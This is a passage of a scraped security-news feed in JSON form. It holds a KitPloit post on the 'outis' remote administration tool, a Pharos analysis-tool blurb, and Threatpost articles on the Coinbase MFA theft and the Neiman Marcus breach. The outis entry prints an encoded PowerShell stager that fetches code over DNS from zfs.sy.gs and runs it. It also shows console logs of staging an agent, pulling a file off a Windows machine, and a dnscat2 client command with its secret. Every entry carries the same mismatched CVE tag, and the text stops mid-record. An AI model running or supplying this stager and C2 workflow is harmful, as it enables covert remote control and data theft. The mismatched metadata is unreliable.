ACQAaQArACsAKQB7ACQAYwA9ACgAWwBzAHQAcgBpAG4AZwBdACgASQBFAFgAIAAiAG4AcwBsAG8AbwBrAHUAcAAgAC0AdAB5AHAAZQA9AFQAWA\n BUACAALQB0AGkAbQBlAG8AdQB0AD0AOQAgAHMAJAAoACQAaQApAHIAJAAoACQAcgApAC4AegBmAHMALgBzAHkALgBnAHMALgAgACIAKQApAC4A\n UwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQA7AGkAZgAoACEAJABjACkAewBpAGYAKAAkAHQAKwArAC0AbAB0ADIAKQB7ACQAaQAtAC0AOwBjAG\n 8AbgB0AGkAbgB1AGUAOwB9AGIAcgBlAGEAawA7AH0AJAB0AD0AMAA7ACQAYQArAD0AJABjADsAfQAkAGEAPQBbAEMAbwBuAHYAZQByAHQAXQA6\n ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQApADsAJABiAD0AJABhAC4ATABlAG4AZwB0AGgAOwAkAGYAcAA9ACIAWA\n B4AEkAMgArAGUAQgBoAGUAUgBMAFMATQBuAHIAVQBNAFgAbgBnAHIARABTAGQATwAyAGQAOAAwAGMAZAB2AHcAcwBKAGMAYwBGAEIAbgAvAGYA\n LwB3AEoATwBpAEIAVAA4AGIATwA2AHAAZgBXAFgAdwBwAEUATwBQAFAAUgBsAFAAdgBnAE8AbgBlAGcAYwBpAE8AYgBPAGEAZABOAFAAVQBxAH\n AAZgBRAD0APQAiADsAJABpAD0AMAA7ACQAYQA9ACQAYQB8ACUAewAkAF8ALQBiAFgAbwByACQAZgBwAFsAJABpACsAKwAlACQAZgBwAC4ATABl\n AG4AZwB0AGgAXQB9ADsAJABwAGsAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAwACwANwA1ADUAKQA7ACQAcw\n BpAGcAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAA3ADUANQAsADYAOAA0ACkAOwAkAHMAPQBOAGUAdwAtAE8A\n YgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAxADQAMwA5ACwAKAAkAGIALQAxADQAMwA5ACkAKQA7ACQAcwBoAGEAPQBOAGUAdwAtAE\n 8AYgBqAGUAYwB0ACAAUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBTAEgAQQA1ADEAMgBNAGEAbgBhAGcAZQBk\n ADsAaQBmACgAQAAoAEMAbwBtAHAAYQByAGUALQBPAGIAagBlAGMAdAAgACQAcwBoAGEALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAHAAaw\n AuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAKQAgACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIA\n aQBuAGcAKAAkAGYAcAApACkAIAAtAFMAeQBuAGMAVwBpAG4AZABvAHcAIAAwACkALgBMAGUAbgBnAHQAaAAgAC0AbgBlACAAMAApAHsAIgBFAF\n IAUgBPAFIAMQAiADsARQB4AGkAdAAoADEAKQB9ADsAJAB4AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5\n AHAAdABvAGcAcgBhAHAAaAB5AC4AUgBTAEEAQwByAHkAcAB0AG8AUwBlAHIAdgBpAGMAZQBQAHIAbwB2AGkAZABlAHIAOwAkAHgALgBGAHIAbw\n BtAFgAbQBsAFMAdAByAGkAbgBnACgAJABwAGsAKQA7AGkAZgAoAC0ATgBvAHQAIAAkAHgALgBWAGUAcgBpAGYAeQBEAGEAdABhACgAJABzAC4A\n VABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAsACIAUwBIAEEANQAxADIAIgAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG\n UANgA0AFMAdAByAGkAbgBnACgAJABzAGkAZwApACkAKQB7ACIARQBSAFIATwBSADIAIgA7AEUAeABpAHQAKAAyACkAfQA7ACIARwBPAEEARwBF\n AE4AVAAiADsASQBFAFgAIAAkAHMAOwA=\n outis> run\n [+] DNS listening on 0.0.0.0:53\n [+] Sending staged agent (34332 bytes)...\n 100% (184 of 184) |########################################################| Elapsed Time: 0:00:16 Time: 0:00:16\n [+] Staging done\n [+] Waiting for connection and TLS handshake...\n [+] Initial connection with new agent started\n [+] Upgrade to TLS done\n outis session> [+] AGENT: Hello from Agent\n \n outis session> download C:\\testfile.txt /tmp/out.txt\n [+] initiating download of remote file C:\\testfile.txt to local file /tmp/out.txt\n [+] agent reports a size of 3295 bytes for channel 1\n 100% (3295 of 3295) |######################################################| Elapsed Time: 0:00:00 Time: 0:00:00\n [+] wrote 3295 bytes to file /tmp/out.txt\n outis session> exit\n Do you really want to exit the session and close the connection [y/N]? y\n outis> exit\n\nOr maybe we want to use dnscat2 for the real deal and just use outis to stage it: \n\n \n \n $ outis outis> set TRANSPORT DNS outis> set AGENTTYPE DNSCAT2 outis> set ZONE zfs.sy.gs outis> run [+] DNS listening on 0.0.0.0:53 [+] Sending staged agent (406569 bytes)... 100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17 [+] Staging done [+] Starting dnscat2 to handle the real connection New window created: 0 New window created: crypto-debug Welcome to dnscat2! Some documentation may be out of date. auto_attach => false history_size (for new windows) => 1000 Security policy changed: All connections must be encrypted and authenticated New window created: dns1 Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = zfs.sy.gs]... Assuming you have an authoritative DNS server, you can run the client anywhere with the following (--secret is optional): ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs To talk directly to the server without a domain name, run: ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== Of course, you have to figure out <server> yourself! Clients will connect directly on UDP port 53. dnscat2> New window created: 1 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) dnscat2> sessions 0 :: main [active] crypto-debug :: Debug window for crypto stuff [*] dns1 :: DNS Driver running on 0.0.0.0:53 domains = zfs.sy.gs [*] 1 :: command (feynman-win7) [encrypted and verified] [*] dnscat2> session -i 1 New window created: 1 history_size (session) => 1000 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) This is a command session! That means you can enter a dnscat2 command such as 'ping'! For a full list of clients, try 'help'. command (feynman-win7) 1> download c:/testfile.txt /tmp/out.txt Attempting to download c:/testfile.txt to /tmp/out.txt Wrote 3295 bytes from c:/testfile.txt to /tmp/out.txt! command (feynman-win7) 1> exit Input thread is over \n\n \nOr maybe we want to use dnscat2 for the real deal and just use outis to stage it: \n\n \n \n $ outis\n outis> set TRANSPORT DNS\n outis> set AGENTTYPE DNSCAT2\n outis> set ZONE zfs.sy.gs\n outis> run\n [+] DNS listening on 0.0.0.0:53\n [+] Sending staged agent (406569 bytes)...\n 100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17\n [+] Staging done\n [+] Starting dnscat2 to handle the real connection\n \n New window created: 0\n New window created: crypto-debug\n Welcome to dnscat2! Some documentation may be out of date.\n \n auto_attach => false\n history_size (for new windows) => 1000\n Security policy changed: All connections must be encrypted and authenticated\n New window created: dns1\n Starting Dnscat2 DNS server on 0.0.0.0:53\n [domains = zfs.sy.gs]...\n \n Assuming you have an authoritative DNS server, you can run\n the client anywhere with the following (--secret is optional):\n \n ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs\n \n To talk directly to the server without a domain name, run:\n \n ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg==\n \n Of course, you have to figure out yourself! Clients\n will connect directly on UDP port 53.\n \n dnscat2> New window created: 1\n Session 1 Security: ENCRYPTED AND VERIFIED!\n (the security depends on the strength of your pre-shared secret!)\n \n dnscat2> sessions\n 0 :: main [active]\n crypto-debug :: Debug window for crypto stuff [*]\n dns1 :: DNS Driver running on 0.0.0.0:53 domains = zfs.sy.gs [*]\n 1 :: command (feynman-win7) [encrypted and verified] [*]\n \n dnscat2> session -i 1\n New window created: 1\n history_size (session) => 1000\n Session 1 Security: ENCRYPTED AND VERIFIED!\n (the security depends on the strength of your pre-shared secret!)\n This is a command session!\n \n That means you can enter a dnscat2 command such as\n 'ping'! For a full list of clients, try 'help'.\n \n command (feynman-win7) 1> download c:/testfile.txt /tmp/out.txt\n Attempting to download c:/testfile.txt to /tmp/out.txt\n Wrote 3295 bytes from c:/testfile.txt to /tmp/out.txt!\n \n command (feynman-win7) 1> exit\n Input thread is over\n\n \n** Inspirations ** \nThis project was inspired by (and shamelessly stole part of its code from): \n\n\n * Empire: \n\n * [ https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py ](<https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py>) \u2014 generate_launcher uses a HTTP(S) stager \n * [ https://github.com/adaptivethreat/Empire/tree/master/data/agent ](<https://github.com/adaptivethreat/Empire/tree/master/data/agent>) \u2014 stager (step two after initial launcher) and agent (step three) \n * [ https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py ](<https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py>) \u2014 [ powershell ](<https://www.kitploit.com/search/label/PowerShell>) script generation and stipping \n * Metasploit: \n\n * [ https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb ](<https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb>) \u2014 CmdStager for bourne, ... \n * ReflectiveDLLInjection: \n\n * [ https://github.com/stephenfewer/ReflectiveDLLInjection ](<https://github.com/stephenfewer/ReflectiveDLLInjection>)\n * p0wnedShell: \n\n * [ https://github.com/Cn33liz/p0wnedShell ](<https://github.com/Cn33liz/p0wnedShell>) \u2014 some ideas for AMSI evation for future use \n * dnscat2: \n\n * [ https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md ](<https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md>) \u2014 ideas on protocol design over DNS \n * [ https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1 ](<https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1>) \u2014 [ powershell ](<https://www.kitploit.com/search/label/PowerShell>) version of the dnscat2 agent \n * dnsftp \n\n * [ https://github.com/breenmachine/dnsftp ](<https://github.com/breenmachine/dnsftp>) \u2014 short script parts for stagers via DNS \n \n** Disclaimer ** \nUse at your own risk. Do not use without full consent of everyone involved. For educational purposes only. \n \n \n\n\n** [ Download outis ](<https://github.com/SySS-Research/outis>) **\n", "cvss3": {}, "published": "2017-09-19T14:00:04", "type": "kitploit", "title": "outis - Custom Remote Administration Tool (RAT)", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2017-09-19T14:00:04", "id": "KITPLOIT:4143386305519508041", "href": "http://www.kitploit.com/2017/09/outis-custom-remote-administration-tool.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-05T14:37:59", "description": "[  ](<https://4.bp.blogspot.com/--9hNXCN9hCQ/WbnEOt8NWBI/AAAAAAAAI4E/JWACq2Oe7J4jlpruoRhVFfXJYl7AT1W-gCLcBGAs/s1600/binary-skull.jpg>)\n\n \n\n\nThe Pharos static binary [ analysis framework ](<https://www.kitploit.com/search/label/Analysis%20Framework>) is a project of the Software Engineering Institute at Carnegie Mellon University. The framework is designed to facilitate the automated [ analysis ](<https://www.kitploit.com/search/label/Analysis>) of binary programs. It uses the ROSE compiler infrastructure developed by Lawrence Livermore National Laboratory for disassembly, control flow analysis, instruction semantics, and more. \n\n \n\n\nThe current distribution in is a substantial update to the previous version, and is part of an ongoing process to release more of the framework and tools publicly. This release has a more generous BSD [ license ](<https://github.com/cmu-sei/pharos/blob/master/LICENSE.md>) than the previous release. Carnegie Mellon University retains the [ copyright ](<https://github.com/cmu-sei/pharos/blob/master/COPYRIGHT.md>) . \n\n \n\n\nThe Pharos framework is a research project, and the code is undergoing active development. No warranties of fitness for any purpose are provided. While this release provides build instructions, unit tests, and some documentation, much work remains to be done. We've tested a few select build configurations, but have not actively tested the portability of the source code. See the [ installation instructions ](<https://github.com/cmu-sei/pharos/blob/master/INSTALL.md>) for more details. \n\n \n\n\n** Pharos Static Binary Analysis Tools **\n\n \n\n\n** APIAnalyzer **\n\nApAnalyzer is a tool for finding sequences of API calls with the specified data and control relationships. This capability is intended to be used to detect common operating system interaction paradigms like opening a file, writing to it, and the closing it. \n\n \n\n\n** OOAnalyzer **\n\nOOAnalyzer is a tool for the [ analysis ](<https://www.kitploit.com/search/label/Analysis>) and recovery of object oriented constructs. This tool was the subject of a paper titled \"Recovering C++ Objects From Binaries Using Inter-Procedural Data-Flow Analysis\" which was published at the ACM SIGPLAN on Program Protection and Reverse Engineering Workshop in 2014. The tool identifies object members and methods by tracking object pointers between functions in the program. This tool was previously named \"Objdigger\" and is the process of being renamed OOAnalyzer as part of a substantial redesign using Prolog rules to recover the object attributes. \n\n \n\n\n** CallAnalyzer **\n\nCallanalyzer is a tool for [ reporting ](<https://www.kitploit.com/search/label/Reporting>) the static parameters to API calls in a binary program. It is largely a demonstration of our current calling convention, parameter analysis, and type detection capabilities, although it also provides a useful [ analysis ](<https://www.kitploit.com/search/label/Analysis>) of the code in a program. \n\n \n\n\n** FN2Yara **\n\nFN2Yara is a tool to generate YARA signatures for matching functions in an executable program. Programs that share significant numbers of functions are likely to have behavior in common. \n\n \n\n\n** FN2Hash **\n\nFN2Hash is a tool for generating a variety of hashes and other descriptive properties of functions in an executable program. Like FN2Yara it can be used to support binary similarity analysis, or provide features for [ machine learning ](<https://www.kitploit.com/search/label/Machine%20Learning>) algorithm. \n\n \n\n\n** DumpMASM **\n\nDumpMASM is a tool for dumping disassembly listings from an executable using the Pharos framework in the same style as the other tools. It has not been actively maintained, and you should consider using ROSE's standard recursive disassembler instead. \n\n \n \n\n\n** [ Download Pharos ](<https://github.com/cmu-sei/pharos>) **\n", "cvss3": {}, "published": "2018-08-26T17:06:59", "type": "kitploit", "title": "Pharos - Static Binary Analysis Framework", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2018-08-26T17:06:59", "id": "KITPLOIT:9205213728263868656", "href": "http://www.kitploit.com/2017/09/pharos-static-binary-analysis-framework.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2021-10-05T20:16:21", "description": "The accounts of at least 6,000 Coinbase customers were robbed of funds after attackers bypassed the cryptocurrency exchange\u2019s multi-factor authentication (MFA).\n\nAccording to a notification letter ([PDF](<https://s3.documentcloud.org/documents/21073975/09-24-2021-coinbase-customer-notification.pdf>)) \u2013 seen and posted by [BleepingComputer, ](<https://www.bleepingcomputer.com/news/security/hackers-rob-thousands-of-coinbase-customers-using-mfa-flaw/>)which first reported the story \u2013 that Coinbase sent to affected customers and filed with the California state Attorney General\u2019s office, the theft happened between March and May 20, 2021.\n\nThe attacker(s) used a flaw in Coinbase\u2019s account recovery process to seize the SMS two-factor authentication tokens needed to break into customers\u2019 accounts and transfer funds to crypto wallets unassociated with Coinbase.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn order to pull it off, the culprits first needed access to victims\u2019 email addresses, passwords, phone numbers and personal email inboxes. Coinbase doesn\u2019t know exactly how the third parties gained access to all that, but the exchange doesn\u2019t think it\u2019s to blame: \u201cWe have not found any evidence that these third parties obtained this information from Coinbase itself,\u201d according to the exchange\u2019s breach notification.\n\nCoinbase noted that such information is often gleaned through phishing attacks or other social engineering techniques that trick victims into disclosing their login credentials.\n\n## Coinbase Phishing Attacks Are Rising\n\nIn fact, earlier this week, on Monday, Coinbase warned that [phishing attacks are on the rise](<https://blog.coinbase.com/phishing-attacks-are-on-the-rise-here-are-some-steps-you-can-take-to-protect-yourself-872833c7671b>), both in terms of volume and success rates. Between April and early May 2021, its security team saw a \u201csignificant uptick\u201d in Coinbase-branded phishing messages that targeted users of a range of commonly used email service providers: attacks that \u201cdemonstrated a higher degree of success\u201d at bypassing spam filters of certain older email services.\n\nCoinbase provided samples of the phishing attacks its team has seen, including the ones shown below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/10/01150844/locked-account-phishing-email-e1633115339529.png>)\n\n\u201cLocked account\u201d phishing email, designed to alarm the recipient into clicking without taking the time to verify other aspects of the message. \nSource: Coinbase.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/10/01151129/Hotmail-phish-e1633115503310.png>)\n\nFor some victims with Hotmail accounts, attackers attempted to add a malicious application to the user\u2019s inbox. If the recipient clicked \u201cYes,\u201d an attacker would be able to read all the user\u2019s emails (including password reset and device verification emails sent by Coinbase). Source: Coinbase.\n\nClearly, cryptocurrency thieves are nothing if not creative, and understandably so: They\u2019re going after a lucrative, juicy target. While they\u2019re considered a secure place for users to store their cryptocurrency assets, [researchers in 2018 proved](<https://threatpost.com/cryptocurrency-wallet-hacks-spark-dustup/140445/>) that wallets such as Ledger and Trezor are vulnerable to a number of cyber attacks.\n\nSubsequent events proved their point: In July 2020, an unauthorized third party [accessed Ledger\u2019s](<https://www.ledger.com/addressing-the-july-2020-e-commerce-and-marketing-data-breach>) e-commerce and marketing database, which held email addresses as well as contact and order details including first and last name, postal address, email address, and phone number.\n\nFollowing the July attack, researchers discovered [widespread campaigns](<https://threatpost.com/malicious-google-web-extensions-cryptowallet/154832/>) spreading malicious browser extensions that were abusing Google Ads and well-known cryptocurrency brands including Ledger to lure victims and eventually steal their cryptocurrency wallet credentials. Other wallets targeted in the campaign included Electrum, Exodus, Jaxx, KeepKey, MetaMask, MyEtherWallet and Trezor.\n\nAs well, the rise of cryptocurrency has made compromised crypto accounts hugely valuable in Dark Web marketplaces, according to the [2021 Dark Web price index](<https://threatpost.com/dark-web-markets-stolen-data/164626/>) from Privacy Affairs.\n\n\u201cDue to the skyrocketing prices of Bitcoin and other cryptocurrencies, hacked accounts may hold large sums of coin-based currency and cash, protected by relaxed security measures after the initial verification process,\u201d according to the report, which listed the average price for a hacked Coinbase-verified account to be $610.\n\n## SMS 2FA Authentication Flaw\n\nTL;DR: There are a lot of ways that the attackers could have gotten Coinbase users\u2019 personal details.\n\nBut beyond the personal information they needed to crack victims\u2019 accounts, the thieves needed more. For customers who use SMS texts for two-factor authentication (2FA), the unauthorized third parties had to leverage what Coinbase called a flaw in its SMS account recovery process, in order to receive an SMS 2FA token so as to gain access to accounts.\n\nCoinbase didn\u2019t go into detail about the flaw: It only said that as soon as it learned about the issue, it \u201cupdated our SMS Account Recovery protocols to prevent any further bypassing of that authentication process.\u201d\n\nIn a [guide on securing accounts](<https://help.coinbase.com/en/coinbase/privacy-and-security/data-privacy/how-can-i-make-my-account-more-secure>), Coinbase recommends enabling MFA authentication using security keys or Time-based One Time Passwords (TOTP) with an authenticator app. Verification via SMS text messages is listed as an option, but with caveats: This verification is, after all, subject to [SIM-swap](<https://threatpost.com/mobile-customer-service-sim-swap-fraud/151993/>) or phone-port attack.\n\nSIM swapping\u200b\u200b is a form of fraud that allows crooks to bypass SMS-based 2FA and crack online banking or other high-value accounts such as cryptocurrency wallets. In a typical scenario, an attacker would start by phishing personal and banking information \u2013 often via SMS phishing, which has the added benefit of confirming that a victim\u2019s cell phone number is an active line. Next, an attacker calls the victim\u2019s mobile carrier \u2013 easily discovered with an online search \u2013 and convinces a service rep to port the line to a different SIM card/device.\n\n## Can We Please Just Ditch SMS-Based 2FA?\n\nExperts agree that we should stick a fork in SMS-based 2FA: It\u2019s clearly toast.\n\nRoger Grimes, author of \u201cHacking Multifactor Authentication\u201d and data-driven defense evangelist, for [KnowBe4, ](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkyRzZ_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74Jad0kl33W4of4UEvii1-2FaSF1UuT-2BEz-2F3w-2Fa4quMRgT-2BQRwS2UzU-2B80mrmRcZ7BOu57U-2BlcUbUsgPP5Wrdcp27qpLYZxzLJ8Qwfb3N2eINqk-2B5ALA-2BX5H1WrmgjAUxrSn8W0e1Z6v5ZnIV13lpn-2B50Ro1gC3Tlq6dmLQeuWBPT6iCljuZaA0Ro4dPQB024lIgxWmvsVLHVUCHy-2BYHA-2BMTirRBLwlLSZQSccA4CzRdeZ-2Fb9M-3D>) said that this has got to be at least the third or fourth time that Coinbase customers have been compromised. While all MFA solutions can be hacked multiple ways, SMS-based MFA are \u201camong the most hackable MFA solutions,\u201d he said.\n\nIt isn\u2019t exactly breaking news. In 2017, the [NIST Digital Identity Guidelines](<https://www.nist.gov/itl/applied-cybersecurity/tig/projects/special-publication-800-63>) said that SMS-based MFA was very weak and shouldn\u2019t be used to protect valuable data and content, going so far as to reserve the right to remove it as an allowed MFA solution completely in the future.\n\nIn spite of that, \u201cSMS-based MFA is probably the most used MFA solution on the internet today,\u201d Grimes said. He blames vendors who force users to rely on SMS-based MFA because that\u2019s what the vendor uses.\n\n\u201cAlmost all the users that do use SMS-based MFA do not know how easily it is hacked,\u201d Grimes contended, which is an issue with all MFA solutions. \u201cUsers are not told how each type can be still be hacked, abused and bypassed, sometimes easily so, and this leads to most users thinking they are being super secure because they are using MFA and far less hackable, when that is absolutely not the case.\u201d\n\nGrimes thinks that the MFA solution lies in making sure \u201cthat all stakeholders (e.g., management, buyers, implementers, sysadmins, users, etc.) understand what the potential weaknesses are for their particular type of MFA, and everyone is educated about possible attacks and how to avoid them.\u201d\n\nChris Clements, vice president of solutions architecture for Cerberus Sentinel, added that it\u2019s incumbent on cryptocurrency users to understand that they\u2019re constantly being targeted by cybercriminals attempting to rob them.\n\nAnd once those funds are gone, they\u2019re gone for good, Clements said. \u201cThe decentralized nature of most coins means that if criminals are successful in stealing them, there\u2019s very little chance you will be able to recover your losses,\u201d he said. \u201cAs such, it\u2019s important that users of cryptocurrency study up and implement appropriate opsec to protect themselves from the inevitable attacks, including ensuring that any computing devices or smartphones are hardened and up to date with the latest security patches and implementing strong unique passwords as well as multi-factor authentication controls such as TOTP or hardware security keys like FIDO. Finally, cold wallets kept completely offline are useful for limiting much easier online attack vectors.\u201d\n\n## Coinbase Makes Good on the Money\n\nCoinbase said that it will deposit funds back into victims\u2019 accounts, \u201cequal to the value of the currency improperly removed from your account at the time of the incident.\u201d Some customers have already been reimbursed, the exchange said, promising that customers will receive \u201cthe full value of what you lost.\u201d\n\nThe exchange is also providing free credit monitoring to affected customers.\n\nCoinbase encouraged users of SMS-based authentication to drop it and to instead use stronger MFA, including TOTP or a hardware security key. It also strongly encouraged victims to change their Coinbase account password to a new, strong and unique password: one that\u2019s not used on any other site.\n\nThe same goes for email accounts: \u201cBecause the third parties needed access to your personal email account as part of this incident, we strongly encourage you to change your password in the same way for your email account and for any other online accounts where you use a similar password,\u201d the exchange advised.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-10-01T20:08:23", "type": "threatpost", "title": "MFA Glitch Leads to 6K+ Coinbase Customers Getting Robbed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-01T20:08:23", "id": "THREATPOST:8325094507099F4F089C61EF2997445C", "href": "https://threatpost.com/mfa-glitch-coinbase-customers-robbery/175290/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-05T20:07:15", "description": "Dallas-based Neiman Marcus Group is known worldwide as the go-to luxury retailer for the well-heeled. But their reputation for impeccable quality just took a big hit with revelations that the company was breached by an attacker back in May 2020.\n\nIt took 17 months for the retailer to notice.\n\nJust this week, Neiman Marcus [acknowledged the compromise](<https://www.neimanmarcusgroup.com/2021-09-30-Neiman-Marcus-Confirms-Unauthorized-Access-to-Customer-Online-Accounts>), which included personal customer information like names, contact information, payment card information (without CVV codes), gift card numbers (without PINs), usernames, passwords and even security questions associated with online Neiman Marcus accounts.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn total, Neiman Marcus, which also controls the brands Bergdorf Goodman, Neiman Marcus Last Call and Horchow, said 3.1 million cards were affected. But more than 85 percent of those had already expired, the company said.\n\n\u201cNo active Neiman Marcus-branded credit cards were impacted,\u201d the company\u2019s statement said. \u201cAt this time, the Company has no evidence that Bergdorf Goodman or Horchow online customer accounts were affected.\u201d\n\nNeiman Marcus is working with law enforcement and cybersecurity company Mandiant to get more information about the [retailer\u2019s compromise](<https://threatpost.com/protect-account-takeover-cyberattacks/175090/>), the company said.\n\n\u201cAt Neiman Marcus Group, customers are our top priority,\u201d Geoffroy van Raemdonck, the company\u2019s CEO, said in the announcement of the breach. \u201cWe are working hard to support our customers and answer questions about their online accounts. We will continue to take actions to enhance our system security and safeguard information.\u201d\n\n## **Undetected NMG Breach \u2018Dangerous\u2019 for Customers **\n\nBut security experts say it\u2019s too late for Neiman Marcus to protect its customers and that the delay in detection of the unauthorized access makes the situation more dire.\n\n\u201cThe breach occurred before Neiman Marcus filed for bankruptcy in September 2020, which could have caused a delay in identification,\u201d said Quentin Rhoads, director of professional services at security firm CriticalStart. \u201cFrom a security perspective it is very dangerous for a company to go this long without detecting and responding to a breach. More damage could have been done that has yet [to be] discovered.\u201d\n\nHe said it\u2019s likely the attackers sold off the access to NMG\u2019s systems to someone else for later abuse.\n\n\u201cEven though most of the credit cards and gift cards stolen don\u2019t contain data like pins and CVVs, and are probably expired, the theft of usernames and passwords is concerning,\u201d Rhoads added. \u201cThis data more than likely would be sold to other attackers who can use this for crimes such as [identity] theft in conjunction with the other personal information stolen.\u201d\n\nHe also said it\u2019s going to be hard to find any firm evidence of the breach, since so much time has passed since the initial compromise.\n\n\u201cMore than likely, critical evidence is no longer present in their systems,\u201d Rhoads said. \u201cThey could easily be unable to identify the initial point of the breach, what other areas did the attackers get access to, what the attackers did outside of stealing data. All of these points are critical for an organization to understand to appropriately notify [affected] parties, identify pathways to prevent this in the future, and [to provide] critical evidence to law enforcement to further criminal investigations.\u201d\n\n## **Lack of Security at Many Orgs Is \u2018Staggering\u2019**\n\nChris Clements, VP of solutions architecture at Cerberus Sentinel, was blunter about Neiman Marcus\u2019 security blunder.\n\n\u201cThe lack of both prevention and detection capabilities at many organizations is simply staggering,\u201d Clements said. \u201cI try as much as possible to shy away from victim blaming, but in many circumstances, organizations have been grossly negligent in securing customer data.\u201d\n\nClements added that in many breaches, it\u2019s very easy for an attacker to get their hands on customer data.\n\n\u201cDespite the press releases that almost never fail to describe the attackers or attack methods as \u2018highly sophisticated,\u2019 the reality is that most breaches aren\u2019t some \u2018super cyber heist plot\u2019 out of a bad movie, but rather akin so some guy walking in the front door and wheeling out a file cabinet and no one is around to notice.\u201d\n\nJustin Fier, a director with Darktrace, said Neiman Marcus\u2019s [security team](<https://threatpost.com/protect-account-takeover-cyberattacks/175090/>) should assume the attacker has been lurking in its systems since May 2020. He adds that it\u2019s the responsibility of Neiman Marcus to adopt a more modern security strategy.\n\n\u201cToday, the most cyber mature retailers are relying on artificial intelligence for everything from credit fraud to supply logistics and, of course, to continually monitor their risk across globally distributed networks and complex digital infrastructures,\u201d Fier said. \u201cAs retailers like Neiman Marcus adapt to a more virtual world and embrace innovations to support remote shopping (like its recently announced virtual sneaker showroom) we should expect attacks on the industry to increase. These innovations open more avenues for attackers to poke to access the private data of consumers. Businesses have a responsibility to ensure their consumers\u2019 personal data is protected with the best defensive technology available to them.\u201d\n\nFor now, Neiman Marcus is asking customers to reset their passwords and has set up a call center for those concerned about their information being compromised.\n\nNick Sanna, CEO of RiskLens, said retailers are under both ethical and regulatory obligations to protect customer data.\n\n\u201cThey have an obligation to keep this sensitive customer data safe and out of the hands of the wrong people, obligations that are both ethical and regulatory in nature,\u201d Sanna said. \u201cThe outcome of not doing this is exactly what Neiman Marcus Group is now facing.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-10-01T17:50:42", "type": "threatpost", "title": "3.1M Neiman Marcus Customer Card Details Breached", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-01T17:50:42", "id": "THREATPOST:49DCD8325E10F7898739335BD99AE94B", "href": 